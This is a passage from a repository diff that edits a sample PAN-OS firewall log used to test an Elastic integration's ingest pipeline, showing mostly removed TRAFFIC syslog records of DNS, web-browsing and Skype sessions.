+ "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "created": "2013-03-25T23:59:47.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log
index 70d2804a712..2857446f693 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log
@@ -1,100 +1,100 @@ -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 
09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,98.149.55.63,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 
09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,50.19.102.116,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 
04:39:54,192.168.0.2,65.55.223.19,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.24,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:27 1,2012/10/30 
09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,65.55.223.31,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 